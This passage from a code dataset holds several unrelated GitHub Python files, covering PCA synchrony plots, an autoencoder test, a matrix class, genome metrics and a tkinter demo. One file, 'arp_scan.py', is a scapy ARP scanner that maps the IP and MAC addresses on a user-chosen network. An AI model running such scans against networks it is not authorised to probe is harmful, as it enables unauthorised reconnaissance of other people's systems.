'repeat': []}\nfor pc in np.arange(n_pcs):\n corrs = [np.corrcoef(lstm_pca_reduce[matchup, r, ..., pc])\n for r in np.arange(n_repeats)]\n diffs = [np.mean(c[[0, 3], [1, 2]]) - np.mean(c[0:2, 2:4])\n for c in corrs]\n isc_pc_diffs = []\n for r, diff in enumerate(diffs):\n isc_diffs_df['difference'].append(diff)\n isc_diffs_df['PC'].append(pc + 1)\n isc_diffs_df['repeat'].append(r)\n isc_pc_diffs.append(diff)\n isc_diffs.append(isc_pc_diffs)\nisc_diffs_df = pd.DataFrame(isc_diffs_df)\nisc_diffs = np.array(isc_diffs).T\n\nobserved, ci, p, distribution = bootstrap_test(isc_diffs,\n bootstrap_axis=0,\n n_bootstraps=1000,\n estimator=fisher_mean,\n ci_percentile=95,\n side='two-sided')\n\n_, fdr_p, _, _ = multipletests(p, method='fdr_bh')\n\nsig_pos = ((fdr_p < .05) & (observed > 0)).nonzero()[0]\nsig_neg = ((fdr_p < .05) & (observed < 0)).nonzero()[0]\n\nfig, ax = plt.subplots(figsize=(16, 4))\nsns.barplot(x='PC', y='difference', data=isc_diffs_df, ax=ax, color='.6',\n estimator=fisher_mean)\n# ax.set_ylim(-.375, .325) # for matchup = 3 (sig y = -.01)\nax.set_ylim(-.3, 1) # for matchup = 0\nax.set_xticks([0, 19, 39, 59, 79, 99])\nfor sig_pc in sig_pos:\n ax.annotate('.', (sig_pc, -.02), color='tab:red', size=40,\n xycoords=('data', 'axes fraction'),\n ha='center', va='bottom')\nfor sig_pc in sig_neg:\n ax.annotate('.', (sig_pc, -.02), color='tab:blue', size=40,\n xycoords=('data', 'axes fraction'),\n ha='center', va='bottom')\nax.set_ylabel('cooperative – competitive ISC')\nax.set_title(f'difference in cooperative vs. competitive ISC for 100 PCs');\nplt.savefig(f'figures/isc_diff-bars_tanh-z_pca-k{pca_k}_m{matchup}.png',\n dpi=300, bbox_inches='tight')\n\n\n\n# Examine time-resolved intersubject synchrony of PCs\nfrom brainiak.isc import isc\nfrom detectors import get_following\n\nmatchup = 0\npops = {0: 'A', 1: 'B', 2: 'C', 3: 'D'}\nrepeat = 1\npc = 10 - 1 \n\nfollowing = get_following(wrap_f, matchup_id=matchup, repeat_id=repeat)\n\nlstm_pc = lstm_pca_reduce[matchup, repeat, ..., pc]\nlstm_pc_isc = isc(lstm_pc.T, pairwise=True)[:, 0]\n\nfig, axs = plt.subplots(10, 1, figsize=(12, 14))\naxs[0].plot(lstm_pc[0], c='darkred', alpha=.7)\naxs[0].plot(lstm_pc[1], c='coral', alpha=.7)\naxs[0].set_xticks([])\naxs[0].set_ylabel('activation')\naxs[0].set_title(f'PC{pc + 1} (population {pops[matchup]}, '\n f'repeat {repeat})')\naxs[0].annotate(f'ISC: {lstm_pc_isc[0]:.3f}', (.95, .95),\n ha='right', xycoords='axes fraction')\naxs[1].plot(lstm_pc[2], c='darkblue', alpha=.7)\naxs[1].plot(lstm_pc[3], c='lightseagreen', alpha=.7)\naxs[1].set_xticks([])\naxs[1].set_ylabel('activation')\naxs[1].annotate(f'ISC: {lstm_pc_isc[5]:.3f}', (.95, .95),\n ha='right', xycoords='axes fraction')\n\nlstm_pc_isps = isps(lstm_pc.T)\naxs[2].plot(lstm_pc_isps[0], c='darkred', alpha=.7)\naxs[2].set_xticks([])\naxs[2].set_ylabel('phase\\nnsynchrony')\naxs[3].plot(lstm_pc_isps[5], c='darkblue', alpha=.7)\naxs[3].set_xticks([])\naxs[3].set_ylabel('phase\\nsynchrony')\n\nlstm_pc_iscf = iscf(lstm_pc.T)\naxs[4].plot(lstm_pc_iscf[0], c='darkred', alpha=.7)\naxs[4].set_xticks([])\naxs[4].set_ylabel('co-fluctuation')\naxs[5].plot(lstm_pc_iscf[5], c='darkblue', alpha=.7)\naxs[5].set_xticks([])\naxs[5].set_ylabel('co-fluctuation')\n\nlstm_pc_win = window_isc(lstm_pc.T)\naxs[6].plot(resample_windows(lstm_pc_win.T[0], width=150,\n collapse=np.nanmean),\n c='darkred', alpha=.7)\naxs[6].set_xticks([])\naxs[6].set_ylabel('window ISC\\n(width=150)')\naxs[7].plot(resample_windows(lstm_pc_win.T[1], width=150,\n collapse=np.nanmean), \n c='darkblue', alpha=.7)\naxs[7].set_ylabel('window ISC\\n(width=150)')\naxs[7].set_xticks([])\n\naxs[8].plot(following[0], c='darkred', alpha=.7)\naxs[8].set_ylabel('following')\naxs[8].set_xticks([])\naxs[9].plot(following[1], c='darkblue', alpha=.7)\naxs[9].set_ylabel('following')\nplt.xlabel('time')\nsns.despine()\n\nplt.savefig(f'PC{pc + 1}_coop_m{matchup}_r{repeat}.png',\n dpi=300, transparent=False,\n bbox_inches='tight')\n\n\n# Correlation matrix of coupling metrics\nmatchup = 0\nn_repeats = 8\npc = 10 - 1\n\ncorrs = []\nfor repeat in np.arange(n_repeats):\n lstm_pc = lstm_pca_reduce[matchup, repeat, ..., pc]\n lstm_pc_isps = isps(lstm_pc.T)\n lstm_pc_iscf = iscf(lstm_pc.T)\n lstm_pc_wins = window_isc(lstm_pc.T)\n following = get_following(wrap_f, repeat_id=repeat, pair_ids=np.arange(6))\n \n pair_corrs = []\n for pair in [0, 5]:\n lstm_pc_win = np.nan_to_num(resample_windows(lstm_pc_wins.T[pair],\n width=150,\n collapse=np.nanmean))\n \n corr = np.corrcoef(np.vstack((lstm_pc_isps[pair],\n lstm_pc_iscf[pair],\n lstm_pc_win,\n following[pair])))\n corrs.append(corr)\n\ncorrs_mean = np.mean(corrs, axis=0)\n\nlabels = ['phase synchrony', 'co-fluctuation', 'windowed ISC', 'following']\nfig, ax = plt.subplots(figsize=(5, 4))\nm = sns.heatmap(corrs_mean, vmin=0, vmax=1, cmap='inferno', annot=True,\n cbar=True, square=True, xticklabels=labels, yticklabels=labels)\nm.tick_params(left=False, bottom=False)\nm.set_title(f'PC{pc + 1} coupling correlation')\nplt.savefig(f'PC{pc + 1}_coop_corrs.png', dpi=300, bbox_inches='tight')\n\n\n\n\n","repo_name":"andrewgoldberg01/social-ctf","sub_path":"lstm_pca.py","file_name":"lstm_pca.py","file_ext":"py","file_size_in_byte":22652,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"32"} +{"seq_id":"24025897174","text":"# STATIC VARIABLES\ntitle = \"PyCar\"\nversion = \"1.0\"\n\n# SCREEN RESOLUTION\nscreenWidth = 1280\nscreenHeight = 720\n\n# CAR IMAGE RESOLUTION\ncarWidth = 53\ncarHeight = 97\n\n# COLORS\ndarkgreen = (0, 100, 0)\nred = (255, 0, 0)\nblack = (0, 0, 0)\nwhite = (255, 255, 255)\n","repo_name":"satyajitGiriASU/2D_SelfDrivingCar_DQN","sub_path":"variables.py","file_name":"variables.py","file_ext":"py","file_size_in_byte":257,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"20551218712","text":"def fibonacci(n):\n \"\"\"Функция принимает в качестве аргумента индекс (целое число)\n\n Функция возвращает число Фибоначчи с этим индексом. \n \"\"\"\n\n if n == 0: return 0\n\n if n in (1, 2): return 1\n\n if n < 0: return fibonacci(n + 2) - fibonacci(n + 1)\n\n return fibonacci(n - 1) + fibonacci(n - 2)\n \ntry:\n x = int(input('Введите число Фибоначчи : '))\n x = fibonacci(x)\n print('Ваше число Фибоначчи : {}'.format(x))\n\nexcept ValueError:\n print('Необходимо вводить целое число')","repo_name":"KristaliX/Fukin-Ivan","sub_path":"Homework 5/3.py","file_name":"3.py","file_ext":"py","file_size_in_byte":664,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"39490462204","text":"import matplotlib\nmatplotlib.use('Agg')\nimport argparse\nimport os\nimport random\nimport time\n\nimport torch\nfrom torch import nn\nimport torch.nn.parallel\nimport torch.backends.cudnn as cudnn\nimport torch.optim as optim\nimport torch.utils.data\nfrom torch.utils.data import DataLoader\nfrom torch.autograd import Variable\nimport torch.nn.functional as F\n\nimport torchvision\nimport torchvision.utils as vutils\nfrom torchvision import transforms\nimport torchvision.datasets as dset\nfrom torchvision.utils import save_image\nimport numpy as np\n\nimport matplotlib.pyplot as plt\n\nfrom models import autoencoder as AE\n\n\n#Set random seed for reproducibility\nmanualSeed = 999\n\nprint(\"Random Seed: \", manualSeed)\nrandom.seed(manualSeed)\ntorch.manual_seed(manualSeed)\n\n\nparser = argparse.ArgumentParser()\n\nparser.add_argument('--bg_data', type=str, dest='data_dst', default='data/data_dst')\nparser.add_argument('--target_data', type=str, dest='data_src', default='data/data_src')\nparser.add_argument('--workers', type=int, default=8)\nparser.add_argument('--batch', type=int, dest='batch_size', default=128)\nparser.add_argument('--image_size', type=int, default=128)\nparser.add_argument('--num_channel', type=int, dest='nc', default=3)\nparser.add_argument('--num_z', type=int, dest='nz', default=100)\nparser.add_argument('--ndf', type=int, default=128)\nparser.add_argument('--nef', type=int, default=128)\nparser.add_argument('--epoch',type=int, dest='num_epochs',default=100)\nparser.add_argument('--lr', type=float, default=1e-3)\nparser.add_argument('--beta1', type=float, default=0.5)\nparser.add_argument('--ngpu', type=int, default=1)\nparser.add_argument('--result', type=str, dest='result_path', default='/home/jjck5938/changed_model/results')\nparser.add_argument('--checkpoint', type=str, default='aemom_sim.pth')\nargs = parser.parse_args()\n\n\ndatasetA = dset.ImageFolder(root=args.data_dst,\n transform=transforms.Compose([\n transforms.Resize(args.image_size),\n transforms.CenterCrop(args.image_size),\n transforms.ToTensor(),\n transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))\n ]))\n\ndataloaderA = torch.utils.data.DataLoader(datasetA, batch_size=args.batch_size,\n shuffle=True, num_workers=args.workers)\n\ndatasetB = dset.ImageFolder(root=args.data_src,\n transform=transforms.Compose([\n transforms.Resize(args.image_size),\n transforms.CenterCrop(args.image_size),\n transforms.ToTensor(),\n transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))\n ]))\n\ndataloaderB = torch.utils.data.DataLoader(datasetB, batch_size=args.batch_size,\n shuffle=True, num_workers=args.workers)\n\n\ndevice = torch.device(\"cuda:0\" if (torch.cuda.is_available() and args.ngpu > 0) else \"cpu\")\n\n\n#Plot some training image\nreal_batch = next(iter(dataloaderB))\nplt.figure(figsize=(8,8))\nplt.axis(\"off\")\nplt.title(\"Training Images\")\nplt.imshow(np.transpose(vutils.make_grid(real_batch[0].to(device)[:64], padding=1, normalize=True).cpu(), (1,2,0)))\nplt.savefig(os.path.join(args.result_path, \"real_sample.png\"))\n\n\ndef weights_init(m):\n classname = m.__class__.__name__\n if classname.find('Conv') != -1:\n nn.init.normal_(m.weight.data, 0.0, 0.02)\n elif classname.find('BatchNorm') != -1:\n nn.init.normal_(m.weight.data, 1.0, 0.02)\n nn.init.constant_(m.bias.data, 0)\n\ndef to_img(x):\n x = 0.5 * (x +1)\n x = x.clamp(0, 1)\n x = x.view(x.size(0), 1, 28, 28)\n return x\n\n\ncheckpoint = torch.load(args.checkpoint, map_location=\"cuda:0\")\nnetE = AE.encoder_(args).cuda()\nnetDA = AE.decoder_(args).cuda()\nnetDB = AE.decoder_(args).cuda()\nmodelA = AE.autoencoder(args, netE, netDA)\nmodelB = AE.autoencoder(args, netE, netDB)\n\nmodelA.load_state_dict(checkpoint['modelA_state_dict'])\nmodelA.to(device)\n\nmodelB.load_state_dict(checkpoint['modelB_state_dict'])\nmodelB.to(device)\n\nreal_img = real_batch[0].to(device)[:32]\n#real_img = torch.unsqueeze(real_img, 0)\nout_imgA = modelA(real_img)\nout_imgB = modelB(real_img)\nprint(\"saving.....\")\nsave_image(out_imgA, './fake_imgB_from_modelA.png')\nsave_image(out_imgB, './fake_imgB_from_modelB.png')\nsave_image(real_img, './real_img.png')\nprint(\"save predict_img success!\")\n","repo_name":"Mombin/Mom_Net","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":4550,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"24221998090","text":"#!/usr/bin/env python\n\n\"\"\"\nUsage:\n neural_network_classification.py nsamples miters hlayers ...\n neural_network_classification.py (-h | --help)\n\nOptions:\n -h --help Show this screen.\n\n\"\"\"\n\nfrom docopt import docopt\n\nfrom sklearn.datasets import make_blobs\n\nfrom pybrain.datasets import ClassificationDataSet\nfrom pybrain.utilities import percentError\nfrom pybrain.tools.shortcuts import buildNetwork\nfrom pybrain.supervised.trainers import BackpropTrainer\nfrom pybrain.structure.modules import SoftmaxLayer\n\nimport matplotlib.pyplot as plt\nfrom matplotlib import animation\nimport numpy as np\n\narguments = docopt(__doc__)\n\nnum_hidden_layers = map(int, arguments[''])\nmax_iters = int(arguments[''])\n\nX1, y1 = make_blobs(n_samples=int(arguments[''])/2, centers=2,\n cluster_std=0.6)\nX2, y2 = make_blobs(n_samples=int(arguments[''])/2, centers=2,\n cluster_std=0.6)\n\nX = np.concatenate((X1, X2))\ny = np.concatenate((y1, y2))\n\nm, n = X.shape\n\ndataset = ClassificationDataSet(n, 1, nb_classes=2)\nfor i in range(m):\n dataset.addSample(X[i], y[i])\n\ntst_data, trn_data = dataset.splitWithProportion(0.25)\n\ntst_data._convertToOneOfMany()\ntrn_data._convertToOneOfMany()\n\nlayers = [trn_data.indim]\nlayers += num_hidden_layers\nlayers += [trn_data.outdim]\n\nneural_network = buildNetwork(*layers, outclass=SoftmaxLayer)\ntrainer = BackpropTrainer(neural_network, dataset=trn_data, verbose=False,\n weightdecay=0.01, momentum=0.1)\n\n\nfig = plt.figure()\nfig.set_size_inches(15, 15)\n\nax_data = plt.subplot(1, 2, 1)\nplt.scatter(X[:, 0], X[:, 1], c=y, s=40)\nplt.xlabel('X1')\nplt.ylabel('X2')\nplt.title('Input Data')\n\nax = plt.subplot(1, 2, 2)\nscat = ax.scatter(tst_data['input'][:, 0], tst_data['input'][:, 1], s=60)\nplt.xlabel('X1')\nplt.ylabel('X2')\nplt.title('Classification of Data using Neural Network')\n\niter_text = ax.text(0, 0, '')\n\n\ndef setup_plot():\n iter_text.set_text('')\n return scat,\n\n\ndef update(i):\n trainer.trainEpochs(1)\n out = neural_network.activateOnDataset(tst_data)\n out = out.argmax(axis=1)\n scat.set_array(out)\n iter_text.set_text('Iteration = '+str(i+1))\n return scat,\n\nanim = animation.FuncAnimation(fig, update, init_func=setup_plot,\n frames=max_iters, repeat=False)\n\nplt.show()\n","repo_name":"abinashpanda/ml_tutorial","sub_path":"neural_network_classification.py","file_name":"neural_network_classification.py","file_ext":"py","file_size_in_byte":2331,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"2968189639","text":"#!/usr/bin/env python\n#ARP Scanner\n\nimport scapy.all as scapy\nimport pprint\n\ndef scan(ip):\n\tarp_request = scapy.ARP(pdst=ip)\n\tbroadcast = scapy.Ether(dst=\"ff:ff:ff:ff:ff:ff\")\n\tarp_request_broadcast = broadcast/arp_request\n\tanswered_list = scapy.srp(arp_request_broadcast, timeout=1, verbose=0)[0]\n\t\n\tprint(\"IP\\t\\t\\t\\tMAC Address\\n---------------------------------------------------------------------\")\n\tfor element in answered_list:\n\t\tprint(element[1].psrc+\"\\t\\t\\t\"+element[1].hwsrc)\n\nip_input = raw_input(\"ENTER THE NETWORK YOU WISH TO ARP SCAN: \")\n\nscan(ip_input)\n \n","repo_name":"KangusPrime/Python-","sub_path":"arp_scan.py","file_name":"arp_scan.py","file_ext":"py","file_size_in_byte":568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"71743305051","text":"import numbers\n\nimport numpy as np\n\n\ndef validate_matrix_dimensions(matrix):\n if len(matrix) == 0:\n raise ValueError(\"Matrix is empty\")\n for m in matrix:\n if len(m) != len(matrix[0]):\n raise ValueError(\"Rows of matrix have different sizes\")\n\n\ndef validate_matrices_for_element_by_element_operation(m1, m2):\n if len(m1) != len(m2) or len(m1[0]) != len(m2[0]):\n raise ValueError(\"Matrices dimensions don't match\")\n\n\ndef validate_matrices_for_multiply_dimensions(m1, m2):\n if len(m1[0]) != len(m2):\n raise ValueError(\"Matrices dimensions don't match\")\n\n\nclass Matrix:\n check_matrix_dimensions = staticmethod(validate_matrix_dimensions)\n check_matrices_for_multiply_dimensions = staticmethod(validate_matrices_for_multiply_dimensions)\n check_matrices_for_element_by_element_operation = staticmethod(validate_matrices_for_element_by_element_operation)\n\n def __init__(self, matrix):\n Matrix.check_matrix_dimensions(matrix)\n self.matrix = matrix\n\n def __str__(self):\n return \"[\" + \"\\n\".join([\n \"[\" + \", \".join([str(element) for element in row]) + \"]\"\n for row in self.matrix\n ]) + \"]\"\n\n def __element_by_element_operation(self, other, operation):\n Matrix.check_matrix_dimensions(other.matrix)\n Matrix.check_matrices_for_element_by_element_operation(self.matrix, other.matrix)\n res_matrix = []\n number_of_cols = len(self.matrix[0])\n for i in range(len(self.matrix)):\n res_matrix.append([operation(self.matrix[i][j], other.matrix[i][j]) for j in range(number_of_cols)])\n return Matrix(res_matrix)\n\n def __add__(self, other):\n return self.__element_by_element_operation(other, type(self.matrix[0][0]).__add__)\n\n def __mul__(self, other):\n return self.__element_by_element_operation(other, type(self.matrix[0][0]).__mul__)\n\n def __matmul__(self, other):\n Matrix.check_matrix_dimensions(other.matrix)\n Matrix.check_matrices_for_multiply_dimensions(self.matrix, other.matrix)\n\n res_matrix = []\n number_of_cols = len(self.matrix[0])\n for i in range(len(self.matrix)):\n row = []\n for j in range(len(self.matrix[0])):\n row.append(sum([self.matrix[i][k] * other.matrix[k][j] for k in range(number_of_cols)]))\n res_matrix.append(row)\n return Matrix(res_matrix)\n\n\nclass WriteMatrixMixin:\n def __init__(self, matrix):\n self.__matrix = matrix\n\n def write_to_file(self, path):\n with open(path, \"w\") as file:\n file.write(self.__str__())\n\n def __str__(self):\n return \"[\" + \"\\n\".join([\n \"[\" + \", \".join([str(element) for element in row]) + \"]\"\n for row in self.__matrix\n ]) + \"]\"\n\n @property\n def matrix(self):\n return self.__matrix\n\n @matrix.setter\n def matrix(self, new_matrix):\n self.__matrix = new_matrix\n\n\nclass ArrayLike(np.lib.mixins.NDArrayOperatorsMixin, WriteMatrixMixin):\n def __init__(self, value):\n super().__init__(value)\n self.value = np.asarray(value)\n\n _HANDLED_TYPES = (np.ndarray, numbers.Number)\n\n def __array_ufunc__(self, ufunc, method, *inputs, **kwargs):\n out = kwargs.get(\"out\", ())\n for x in inputs + out:\n if not isinstance(x, self._HANDLED_TYPES + (ArrayLike,)):\n return NotImplemented\n\n inputs = tuple(x.value if isinstance(x, ArrayLike) else x\n for x in inputs)\n if out:\n kwargs[\"out\"] = tuple(\n x.value if isinstance(x, ArrayLike) else x\n for x in out)\n result = getattr(ufunc, method)(*inputs, **kwargs)\n\n if type(result) is tuple:\n return tuple(type(self)(x) for x in result)\n elif method == \"at\":\n return None\n else:\n return type(self)(result)\n\n def __repr__(self):\n return \"%s(%r)\" % (type(self).__name__, self.value)\n\n\nif __name__ == \"__main__\":\n np.random.seed(0)\n a = Matrix(np.random.randint(0, 10, (10, 10)))\n b = Matrix(np.random.randint(0, 10, (10, 10)))\n with open(\"artifacts/easy/matrix+.txt\", \"w\") as file:\n file.write((a + b).__str__())\n with open(\"artifacts/easy/matrix*.txt\", \"w\") as file:\n file.write((a * b).__str__())\n with open(\"artifacts/easy/matrix@.txt\", \"w\") as file:\n file.write((a @ b).__str__())\n\n a = ArrayLike(a.matrix)\n b = ArrayLike(b.matrix)\n (a + b).write_to_file(\"artifacts/medium/matrix+.txt\")\n (a * b).write_to_file(\"artifacts/medium/matrix*.txt\")\n (a @ b).write_to_file(\"artifacts/medium/matrix@.txt\")\n","repo_name":"df530/AdvancedPython2022","sub_path":"hw_3/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4692,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"12266094031","text":"import os.path\nfrom py4j.java_gateway import JavaGateway\nfrom LogoFinder import Detect_Logo\nfrom OCR import contentVerify\n\n#This function processes the image and return the appropriate image\n\n#Input: String (name of the image), Boolean (Filter or not)\n#Output: String (name of the original/updated image)\n\ndef imageProcessor(image, filterRequested):\n decidedImage = image\n#(Step 1) Given an image name, if it fails to find the image, error must be raised.\n if not os.path.isfile(image):\n raise IOError\n\n#Don't filter out jpg. They are already compressed enough!\n ext = os.path.splitext(image)[-1].lower()\n if ext == \".jpg\":\n filterRequested = False;\n\n#(Step 2) Using OCR, verify whether the image is for the advertisement purpose or not.\n score = 0\n advertisement = False\n \n #If there is a brand name, it is possible that it's going to be the advertisement\n if Detect_Logo(image):\n score += 1\n \n score += contentVerify(image)\n \n #print(score)\n #If the score reaches the threshold, then consider it as an advertisement\n if score >= 10:\n advertisement = True\n\n#(Step 3) Using Java, Convert image from original to Grayscale without modifying the original image\n if filterRequested and advertisement:\n gateway = JavaGateway()\n convertImage = gateway.entry_point\n convertImage.runImageProcessing(image)\n decidedImage = 'Filtered.png'\n gateway.close()\n \n#based on the \"filterRequest\" Boolean, send the name of original/updated image\n return decidedImage\n\n#Tester\n#print(imageProcessor('DEMO1.png', True))\n#Tester\nif __name__ == '__main__':\n imageForTest = \"proteinsale.png\"\n image_path = os.getcwd() + \"\\\\img\\\\\" + imageForTest\n print(contentVerify(image_path))","repo_name":"chihiroanihr/ecomail","sub_path":"ImageProcessor.py","file_name":"ImageProcessor.py","file_ext":"py","file_size_in_byte":1779,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"24285890882","text":"#!/usr/bin/env python3\nimport csv\nimport src.metric as metric\nimport sys\nimport src.classSpecies as classSpecies\nimport src.ncbi as ncbi\nimport os\n\n#opening of the csv.\ncsvfile = open(sys.argv[1]) # CSV containing \"taxid\" \"human_gene\" \"ortholog\"\ncsv_reader = csv.DictReader(csvfile)\n\nhuman_gene_set = set() # set of humans genes\nspecies_dic = dict() # dic of object species\n\n#recovery of species and associated genes.\nfor row in csv_reader:\n human_gene_set.add(row[\"human_gene\"]) # creates a set of all the available human genes\n if row[\"taxid\"] not in species_dic: # if the species object for this taxid does not exists\n species_dic[row[\"taxid\"]] = classSpecies.species(row[\"taxid\"])\n species_dic[row[\"taxid\"]].set_species_name(row[\"species\"])\n species_dic[row[\"taxid\"]].add_gene(row[\"human_gene\"], row[\"geneID\"]) # uses the add_gene function to add the current ortholog to the species object\n\n#we browse species by species\nfor taxid, classSpecies in species_dic.items():\n if os.path.isfile('work_done.txt'):\n exist=False\n work_done = open('work_done.txt','r')\n lignes = work_done.readlines()\n work_done.close()\n for i in lignes:\n if int(i)==int(taxid):\n print(\" We already have metrics for the species {}. We move on to the next specie. \".format(classSpecies.species))\n exist=True\n\n if exist==True:\n continue\n \n print(\"download gff and fasta files for the {} species \".format(classSpecies.species))\n #recovery of genomes in the form of fasta and gff\n try:\n extracted_file_list=ncbi.get_genome(classSpecies.species)\n except:\n print(\"we not find the fasta and the gff of the complete genome of {} species, we move on to the next specie.\".format(classSpecies.species))\n continue\n #verification that we have one fasta and one gff files.\n if len(extracted_file_list) != 2:\n if len(extracted_file_list)==1:\n print(\"the fasta or the gff is missing for the {} species. We go to the next species\".format(classSpecies.species))\n os.remove(extracted_file_list[0])\n continue\n else:\n print(\"there is more than one fasta or gff uploaded for the {} species. We go to the next species\".format(classSpecies.species))\n for i in extracted_file_list:\n os.remove(i)\n continue\n pathToFasta= extracted_file_list[1]\n pathToGFF= extracted_file_list[0]\n \n #creation of a dictionary with the human taxID as key and an info_gene object in value\n genIDlist=dict()\n for humanid,genID in classSpecies.get_genes().items():\n genIDlist[genID[0]]=humanid\n \n #parsing of the gff to get the coordinates of genes, exons and chromosomes\n print(\"gff parsing\")\n dict_genes=metric.parsingGFF(genIDlist,pathToGFF)\n #parsing of the fasta to obtain the sequences of the genes, exons and regions, flanking\n print(\"fasta parsing\")\n dict_genes=metric.parsing_fasta(dict_genes,pathToFasta)\n \n \n #calculation of GC rates from the sequences obtained\n for i in dict_genes.values():\n metric.taux_GC(i)\n \n #obtaining the size of the introns\n metric.get_intron_size(dict_genes)\n \n #creation of different metric files (one per metric)\n if not os.path.isfile('metrics_GC_gene.tsv'):\n metric.create_tab_metrics(human_gene_set,'GC_gene')\n metric.write_tab_metrics(dict_genes,'GC_gene',taxid)\n \n if not os.path.isfile('metrics_GC_exons.tsv'):\n metric.create_tab_metrics(human_gene_set,'GC_exons')\n metric.write_tab_metrics(dict_genes,'GC_exons',taxid)\n \n if not os.path.isfile('metrics_GC3_exons.tsv'):\n metric.create_tab_metrics(human_gene_set,'GC3_exons')\n metric.write_tab_metrics(dict_genes,'GC3_exons',taxid)\n \n if not os.path.isfile('metrics_intron_size.tsv'):\n metric.create_tab_metrics(human_gene_set,'intron_size')\n metric.write_tab_metrics(dict_genes,'intron_size',taxid)\n \n if not os.path.isfile('metrics_GC_flanking_region_before.tsv'):\n metric.create_tab_metrics(human_gene_set,'GC_flanking_region_before')\n metric.write_tab_metrics(dict_genes,'GC_flanking_region_before',taxid)\n \n if not os.path.isfile('metrics_GC_flanking_region_after.tsv'):\n metric.create_tab_metrics(human_gene_set,'GC_flanking_region_after')\n metric.write_tab_metrics(dict_genes,'GC_flanking_region_after',taxid)\n \n \n if not os.path.isfile('work_done.txt'):\n work_done = open('work_done.txt','w')\n work_done.write(str(taxid)+'\\n')\n work_done.close() \n else:\n work_done=open('work_done.txt','a')\n work_done.write(str(taxid)+'\\n')\n work_done.close()\n os.remove(pathToFasta)\n os.remove(pathToGFF)\n\nos.remove(\"work_done.txt\") \n","repo_name":"xyloforce/genomic_landscapes","sub_path":"get_metric_from_geneID.py","file_name":"get_metric_from_geneID.py","file_ext":"py","file_size_in_byte":4766,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"4799665378","text":"#Kaylee Petek\r\n#CS61002 Algorithms and Programming I\r\n#Lab 07\r\n#November 7, 2021\r\n\r\n#A pgrogram to move a ball left, right, up, and down\r\n\r\n#import tkinter\r\nfrom tkinter import *\r\n\r\n#create a class to move a ball on a screen\r\nclass moveBall:\r\n def __init__ (self):\r\n self.root = Tk () #constructs root window\r\n self.root.title(\"Moving Ball\") #Create a title\r\n self.root.resizable (False, False) #size cannot be changed\r\n\r\n self.width=300 #create a width variable\r\n self.height=300 #create a height variable\r\n self.canvas = Canvas (self.root, width=self.width, height=self.height) #create the canvas\r\n self.canvas.pack() #display the canvas\r\n\r\n frame = Frame(self.root) #create the frame\r\n frame.pack() #display the frame\r\n\r\n self.canvas.create_rectangle(10,10,290,290) #create a border\r\n\r\n x1=self.width/2 #create coordinate variable for x1\r\n y1=self.height/2 #create coordinate variable for y1\r\n x2=x1+10 #create coordinate variable for x2\r\n y2=y1+10 #create coordinate variable for y2\r\n self.ball = self.canvas.create_oval(x1,y1,x2,y2, fill=\"red\") #create a ball\r\n \r\n btLeft = Button (frame, text = (\"Left\"), command = self.moveBallLeft) #create a left button that moves the ball left\r\n btRight = Button (frame, text = (\"Right\"), command = self.moveBallRight) #create a right button to move the ball right\r\n btUp = Button (frame, text = (\"Up\"), command = self.moveBallUp) #create an up button to move the ball up\r\n btDown = Button (frame, text = (\"Down\"), command = self.moveBallDown) #create a down button to move the ball down\r\n\r\n btLeft.pack(side=LEFT) #display the left button on the left side\r\n btRight.pack(side=RIGHT) #display the right button on the right side\r\n btUp.pack() #display the up button above the down button\r\n btDown.pack() #display the down button below the up button\r\n\r\n self.root.mainloop() #enters a game loop\r\n \r\n #create a function to move the ball left\r\n def moveBallLeft (self):\r\n left, top, right, bottom = self.canvas.coords(self.ball) #obtain coordinates of the ball\r\n if left <= 10: #if the ball reaches an x coordinate of 10 or less\r\n x = 0 #do not move further on the x, x becomes 0\r\n else: # if the x coordinate is greater than 10\r\n x=-10 #move to the left 10 spaces\r\n y=0 #no change in y\r\n self.canvas.move(self.ball, x, y) #move the ball\r\n\r\n \r\n #create a function to move the ball right \r\n def moveBallRight (self):\r\n left, top, right, bottom = self.canvas.coords(self.ball) #obtain coordinates of the ball\r\n if right>=290: #if the ball reaches an x coordinate of 290 or more\r\n x = 0 #do not move the ball further (it reached the boundary)\r\n else: #else the x coordinate is less than 290\r\n x= 10 #change the x coordinate by 10 to the right\r\n y=0 #no change in y\r\n self.canvas.move (self.ball, x, y) #move the ball\r\n\r\n \r\n #create a function to move the ball up \r\n def moveBallUp (self):\r\n left, top, right, bottom = self.canvas.coords(self.ball) #obtain the coordinates\r\n if top<=10: #if the ball reaches a y coordinate of 10 or less\r\n y = 0 #do not move the ball (it reached the boundary)\r\n else: #else the ball has a y coordinate of more than 10\r\n y=-10 #change the y coordiante by 10 up\r\n x=0 #no change in x\r\n self.canvas.move(self.ball, x, y) #move the ball up\r\n \r\n #create a function to move the ball down\r\n def moveBallDown(self):\r\n left, top, right, bottom = self.canvas.coords(self.ball) #obtain the coordinates of the ball\r\n if bottom>=290: #if the ball reaches a y coordinate of 290 or more\r\n y = 0 #do not change y (it reached the boundary)\r\n else: #else the ball has a y coordinate of less than 290\r\n y=10 #change the y coordinate by 10 down\r\n x=0 #no change in x\r\n self.canvas.move (self.ball, x, y) #move the ball down\r\n \r\n\r\n\r\n#call the class\r\nmoveBall()\r\n\r\n","repo_name":"kpetek/Python","sub_path":"KayleePetekLab07.py","file_name":"KayleePetekLab07.py","file_ext":"py","file_size_in_byte":4191,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"7125552534","text":"import gym\nimport gym_bertrandcompetition\nfrom 